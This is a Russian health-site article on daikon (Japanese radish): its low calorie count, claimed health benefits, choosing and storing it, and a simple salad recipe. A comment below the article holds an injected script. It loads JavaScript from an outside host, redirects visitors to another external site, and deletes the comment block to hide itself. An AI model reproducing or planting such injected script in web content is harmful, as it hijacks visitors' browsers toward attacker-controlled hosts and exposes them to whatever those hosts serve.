Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Японская редька: мало кал...  >>  Японская редька: мало калорий, много пользы
 
Обратная связь
 

Японская редька: мало калорий, много пользы

Размер шрифта
21 марта 2012 10:00
  • google_analytics: false
  • Нравится

Продукты с разных концов света – насколько они полезны и чем уникальны? Сегодня речь пойдет о японском овоще: дайконе. Как его выбрать, как правильно хранить и как приготовить?

1 

Дайкон (яп. «великий корень») или японская редька, на самом деле – средиземноморский продукт. Эта культура хорошо прижилась на японских островах более пяти веков назад и теперь воспринимается как восточный продукт.

Достоинства дайкона:

  1. Низкая калорийность (от 19 до 21 ккал на 100 г продукта).

  2. Содержит фитонциды. Фитонциды убивают патогенную микрофлору полости рта и кишечника.

  3. Большое содержание калия. Дайкон действует как слабое мочегонное средство, способствуя выводу натрия и уменьшению отеков.

  4. Большое количество грубых волокон и клетчатки. По этой причине употребление японской редьки снижает уровень холестерина и триглицеридов. Обилие клетчатки нормализует работу кишечника при запорах.

  5. Содержит ферменты амилазу, диастазу, протеазу, участвующие в переработке углеводов и белков.

  6. Разжижает мокроту.

В отличие от отечественных корнеплодов, свеклы и моркови, дайкон в 5 раз меньше накапливает соли тяжелых металлов из почвы.

Как выбрать

Корнеплод должен быть упругим, без следов гниения или повреждений. Зеленые листья говорят о свежести товара.

Как хранить

Дайкон портится при потере влаги. Поэтому лучше корень поместить в вакуумный контейнер с влажными салфетками и хранить в холодильнике не больше 2 недель.

Как приготовить

Промытый корнеплод следует обрезать на обоих концах. Кожуру удалять желательно в минимальном количестве, так как именно она содержит больше всего витаминов и других полезных веществ.

Рецепт:

Протертая японская редька
Протертые зеленые яблоки
Лимонный сок
Оливковое масло

Ингредиенты смешать, заправить лимонным соком и оливковым маслом и подавать к столу.

 

Сюжеты по теме:
Японское ископаемое. Рецепт салата с дайконом

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

30 июня 2015 в 23:49

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Пищевая пирамида   10 самых полезных продуктов   Возрастные изменения   Как понять, что вам не хватает грубого волокна  
24 мая 2012«Гены ожирения» влияют на пищевой рацион 27 сентября 2011Картофель – самый полезный овощ?
 
26 августа 2011Использование антибиотиков приводит к ожирению 18 августа 2011Калий предохранит от инсульта
 

Слайдшоу

1
Супереда для бодрости и настроения. Часть 1
10 причин съесть морковку
Суперпродукты против усталости

Тесты

Советы по уходу за кожей
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.